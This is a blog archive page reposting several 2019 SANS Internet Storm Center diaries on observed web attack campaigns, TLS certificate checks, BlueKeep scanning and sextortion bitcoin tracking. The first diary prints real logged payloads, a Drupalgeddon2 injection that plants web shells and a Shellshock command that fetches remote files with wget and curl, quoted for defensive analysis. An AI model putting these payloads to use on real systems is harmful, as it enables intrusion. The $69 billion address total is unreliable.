Archive for August, 2019

[Guest Diary] The good, the bad and the non-functional, or "how not to do an attack campaign", (Thu, Aug 8th)

[This is a guest diary submitted by Jan Kopriva]

Probably anyone who deals with security analysis of logs, PCAPs or other artifacts on a daily basis has come across some strange or funny texts, payloads or messages in them.

Sometimes, these unusual texts are intended as jokes (such as the „DELETE your logs“ poem which was logged by a large number of HTTP servers back in 2015 [1]), while at other times they may be connected with malicious activity. If you have an IPS/IDS deployed in front of your webservers, you’ve no doubt seen logs of HTTP GET requests for the path „/“. Although these requests might seem funny, they represent an indicator of a potential attack, since they are generated by the ZmEu scanner, which is often used in campaigns targeting servers with phpMyAdmin installed.

While certain benign-looking requests, such as the ones generated by ZmEu, might indicate malicious activity, sometimes the opposite is true as well. Couple of times this year, we’ve noticed untargeted attempts at exploiting vulnerabilities on web servers with the intent to inform administrators about the need to patch the software they’re running.

Some of these warning activities were „grey“ in their nature at best. This was the case with the following example from March 2019, where the message to an administrator of a WordPress site was followed by an attempt to exfiltrate data from the targeted server.

Other attempts at warning the administrators, however, seemed to be well-intentioned, if not strictly ethical. A good example might be a campaign targeting Drupal sites vulnerable to CVE-2018-7600 (i.e. the „Drupalgeddon2 vulnerability“), which was active in March and April of this year and in which its authors tried to get the message across by creating a file on the server named vuln.htm and containing the text „Vuln!! patch it Now!“.

When decoded (and with line breaks added), the POST data look like this:

mail[#markup]=echo Vuln!! patch it Now!> vuln.htm&

Unfortunately, it seems that some not-so-well-intentioned actors took inspiration from this, as a similar campaign appeared in April, in which its authors tried to create the same file with the same content on the targeted server. Unfortunately, they tried to create a couple of web shells named vuln.php, modify the .htaccess file and download another PHP file to the server at the same time.

When decoded (and again slightly modified), the parameters in the request look like this:

name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; 
echo 'Vuln!!'> sites/default/files/vuln.php; 
echo 'Vuln!!'> vuln.php; cd sites/default/files/; 
echo 'AddType application/x-httpd-php .jpg' > .htaccess; 
wget 'http://domain_redacted/Deutsch/images/up.php'

The unfortunate fact that in this case, a malicious actor managed to create something damaging based on something which was intended to be benign and possibly even helpful reminded me of an interesting campaign, where the opposite was true and where the relevant logs and PCAPs were both strange and funny.

In this campaign, which we detected between July 23, 2016, and August 4, 2016, it’s author tried to target web servers vulnerable to Shellshock using HTTP GET requests with a payload placed in the User-Agent header. So far nothing unusual.

What made this campaign stand out was that its author seemed to have reused someone else’s code in an incorrect fashion. The payload code was straightforward and appeared to have been intended for download of a malicious file from the attacker‘s domain to the targeted server. However, the actor behind the campaign probably made a mistake while modifying the placeholders in the code, where his own domain should have been, which resulted in something quite unexpected…

The relevant part of payload (slightly modified) looks like this:

system("wget http://ip_redacted/YOUR_URL_HERE ;
curl -O http://ip_redacted/YOUR_URL_HERE ;
fetch http://ip_redacted/YOUR_URL_HERE");

It probably won’t come as a surprise, that the path /YOUR_URL_HERE on the attacker’s server (all requests seen contained the same IP address of this server) didn’t contain any file and attempts to access it resulted in a HTTP 404 code. That meant that even if a vulnerable server was targeted, the payload wouldn’t be able to download any malicious files to it. 

Someone mentioned to me a theory at the time, that it might have been an original promotional campaign for a botnet for hire (i.e. „As you may see, I have this active botnet which may be used to spread malware – YOUR URL could be HERE“). However, this seems quite unlikely and a – by far – more probable explanation is that the malicious actor simply made an error

Although this isn’t the only malicious campaign where an attacker seems to have made a simple mistake like this, the fact that it ran for almost two weeks in this broken state makes it quite unusual…and one of the best examples I’ve ever seen of how not to do an attack campaign.



(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Verifying SSL/TLS configuration (part 2), (Wed, Aug 7th)

This diary is the second part in the series on verifying SSL/TLS configuration – penetration testers, but also security auditors should find this series really useful (let us know if you like it, or if there is another related topic you think should be covered).

In this part we will talk about certificates used on SSL/TLS services. In the previous part, available HERE, I showed couple of tools I like to use when testing SSL/TLS configuration. In this diary we will talk about checking certificates, while the next one will cover ciphers.

As I mentioned, one of my favorite tools for checking SSL/TLS configuration is nmap, with some of really useful NSE scripts. The one I use for checking certificates is the ssl-cert script. This script is very easy to use and will basically show all information that we need to know about to us, as shown below for the web site:

$ nmap -sT -p 443 -Pn –script ssl-cert
Starting Nmap 7.70SVN ( ) at 2019-08-07 09:38 UTC
Nmap scan report for (
Host is up (0.085s latency).

443/tcp open  https
| ssl-cert: Subject:
| Subject Alternative Name:,,,,,
| Issuer: commonName=Let’s Encrypt Authority X3/organizationName=Let’s Encrypt/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2019-07-16T13:52:00
| Not valid after:  2019-10-14T13:52:00
| MD5:   6c32 54b2 b168 29de fd51 3955 0789 b46d
|_SHA-1: c714 a765 b0bc 5770 78b5 2e33 0dee 4cc0 de80 c879

Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds

I have highlighted important fields that we should be paying attention to when verifying certificates, so let’s explain them:

  • Not valid before and Not valid after fields define the time interval in which the certificate is valid. Obviously, when verifying certificates we should make use that the certificate is currently valid and not expired, otherwise an error will be presented.
  • The Issuer field defines who issued the certificate. This should be a well known, trusted Certificate Authority – in this example we can see that is using Let’s Encrypt Authority, which is a free CA (another reason to encrypt everything today!).
    We could verify the trust chain now and find that this is a trusted CA – just keep mind that if you are performing this test on an internal network that, before starting with the penetration test, you should ask the client to specify which internal CA’s they use – these should be trusted, of course.
    Additionally, if you are using automated vulnerability scanners such as Nexpose, Nessus or Qualys, with most of them you can import the list of trusted CA’s. This will help with reducing false positives.
  • The Subject field defines the web site for which the certificate has been issued. The parameter we are interested in is the cn (commonName) parameter and it must match exactly the target site name (what is being entered in the address bar in a browser). So when we access, the cn field must be (and not
    That being said, I must also stress out that modern web browser deprecated the cn parameter in the Subject field and now require an additional field: Subject Alternative Name (SAN) that must be present and must match the site name. As we can see, the certificate used on correctly sets that field as well. A lot of browsers will report an incorrect certificate if that field does not exist – for example Google Chrome requires SAN from version 58 and later. In other words – make sure that you verify if the SAN field is there, and if it is set correctly.
    Notice here that if the Subject and Issuer fields are the same – we are looking at a self-signed certificate. Otherwise, it is an untrusted certificate – I wanted to stress this our specifically because I see a lot of incorrect reports (even in vulnerability scanners!).
  • Public key type and size for this certificate are set to RSA and 2048 bits. This is (currently) the de facto standard – anything lower than 2048 bits is not considered safe, and will be reported by modern browser. So when you see a certificate with 1024 bits, that should be reported and a new one should be generated.
  • Finally, signature algorithm: today it should be always SHA-256 (as we can see above it is set to sha256WithRSAEncryption). MD5 and SHA-1 are not considered safe any more and should be avoided. Google Chrome stopped supporting SHA-1 from version 57.

With this we know how to read the output of the ssl-cert script, so we can report on any issues identified.

In next diary we will talk about encryption algorithms and protocols that we need to pay attention to.


(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Scanning for Bluekeep vulnerable RDP instances, (Mon, Aug 5th)

Since the Microsoft Remote Desktop Protocol (RDP) vulnerability CVE-2019-0708, commonly knows as BlueKeep, was  first announced in May of 2019, the security industry has been holding their breath waiting for the worse case scenario. Scanning for vulnerable RDP instances began almost immediately after the announcement. Since then a number of exploits for BlueKeep have been seen that can crash vulnerable systems, but the anticipated wormable exploit hasn’t yet materialized.

Now that both Immunity’s Canvas and Rapid7’s Metasploit have working exploits in their penetration testing tools you have to believe that it is only a matter of time until the bad guys have one as well.

It would be nice to say that the number of systems running a vulnerable RDP instance has decreased since the vulnerability announcement, but for the IP space I have been tracking I have only seen a decrease of about 10% in vulnerable systems over the last 90 days.

If you are a security administrator and want to find the BlueKeep vulnerable systems on your network, how would you go about it?  For the Bluekeep vulnerability it is relatively easy. With access to a *nix box with the high speed scanner masscan and the rdpscan tool installed along with their dependencies, it is a very easy bash script. 

I called this bash script


#create a date parameter for the various files so scans run on different dates don’t overwrite each other.
TDATE=`date +%Y%m%d`
# put your IPs or IP ranges you would like to scan in scan_ips.txt 
# this will be used as the input to masscan
# the output file is rdpips-.txt
echo “executing masscan”
/usr/bin/masscan -p3389 -v -iL scan_ips.txt > rdpips-$TDATE.txt
#the output from the masscan will be used as the input to rdpscan
#the output file will be RDP_results-.txt
echo “executing rdpscan”
rdpscan –file rdpips-$TDATE.txt > RDP_results-$TDATE.txt


As the comments state, place your IP addresses or ranges to be scanned in the file scan_ips.txt.  This will be used as the input file for this script.  The output will be two files:

* The masscan output file will be rdpips-.txt, all IPs found with RDP open on port 3389
* the rdpscan output file will be RDP_results-.txt, the rdpscan result showing each detected RDP instance and whether or not rdpscan believes they are vulnerable to BlueKeep

Checking the rdpscan output in RDP_results-.txt you will generally find one of 3 results: – SAFE – Target appears patched

or  – VULNERABLE – got appid

there is also an UNKNOWN result, which is usually one of: – UNKNOWN – RDP protocol error – receive timeout – UNKNOWN – no connection – connection closed (RST)

Concentrate on resolving the VULNERABLE results and you will sleep much better when the wormable exploit finally hits.


— Rick Wanner MSISE – rwanner at isc dot sans dot edu – – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Sextortion: Follow the Money – The Final Chapter, (Mon, Aug 5th)

For the background on this diary please see the previous diaries on Sextortion: Follow the Money: Diary 1, Diary 2, Diary 3

Since the last update in the Sextortion series I have contined to track the bitcoin addresses reported to the ISC.  Altogether 563 BTC addresses have been reported.  90 of those addresses received 497 payments totalling over $785,000 USD. That is an average payment of nearly $1600 USD at current Bitcoin prices. Over $530,000 USD of that value has been moved out of the tracked addresses, leaving about $250,000 USD still sitting in the tracked addresses.

I still believe that the addresses we are tracking are a very small percentage of the overall addresses used in the various sextortion campaigns, but even these addresses received, and moved out a not insignificant amount of value.

As shown in Diary 3,at that point is was possible to track over $40 Million USD of payments being sent into Bitcoin mixers to have the payments laundered for extraction, and that was only a small amount of the value that was in the consolidation addresses.   The rest had not moved out yet, leaving over $100 Million USD behind presumably to be moved out later. 

Unfortunately, shortly after that diary was published, the bad guys got more creative with the way they moved value out of the BTC wallets, breaking the tools I was using to find the consolidation wallets. It appeared as if they were consolidating the value in new addresses, fragmenting the value again, reconsolidating, etc.  in order to make it far more difficult to follow where the value was going.

Still I was, with some patience, able to track some of the BTC value to some consolidation wallets, and the dollar values are truly frightening.  Keep in mind that I cannot attribute all of the value in these consolidation BTC addresses to the Sexploitation campaigns, all I can be sure of is that the money from some of the sexplotiation BTC addresses was moved into these addresses, so presumably it belongs to the same criminal enterprise that was running the Sexploitation campaigns. Also, the value is based on the current value of Bitcoin.  With the volativity of Bitcoin the actual value may have been more or less at the time the value was moved out. Some of these consolidation BTC addresses appear to still be in use.  The values in them were changing as I was writing this diary. 

Here are the top 5 consolidation BTC addresses by value that I could find:

Consolidation Address Total BTC Total USD
39id1GfYff4x5r7UEALUjPYVQPGuMj5L1g 61.93172327 $683,881.05
3QR7FADzk6U227eJ3Ud1vxzmh4HNWpnbgp 140.1842615 $1,547,984.71
1DX3MvGTanzcTgnHw8SnorhgpQNHspSWTX 655.84167 $7,242,131.68
179KLpQM8Mse6MmG5gk6JTSokQohiGGrbh 6,437.50 $71,086,105.01
1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s 6,229,301.73 $68,787,064,396.14

Like I said a truly frightening number…almost $69 Billion USD! It is important to remember that these consolidation addresses are the ones I was able to find using only our very limited set of tracked Sexploitation BTC addresses, there are very likely many more consolidation addresses in use.

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →

Detecting ZLIB Compression, (Sun, Aug 4th)

In diary entry “Recognizing ZLIB Compression“, I mention my tool it’s mainly a wrapper for command file (libmagic).

By default, command file has no definitions to detect ZLIB detection, but my tool uses an additional file with custom definitions:

Take for example a ZLIB compressed stream in a PDF document:

As you can see, the stream starts with 0x78, an indication that this is ZLIB compression.

Piping this stream in my tools helps identifiying the unfiltered stream content:

Of course, if you don’t want to use this tool, you can just integrate these ZLIB definitions in your own definiton files.

Didier Stevens
Senior handler
Microsoft MVP

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Reposted from SANS. View original.

Posted in: SANS

Leave a Comment (0) →
Page 5 of 6 «...23456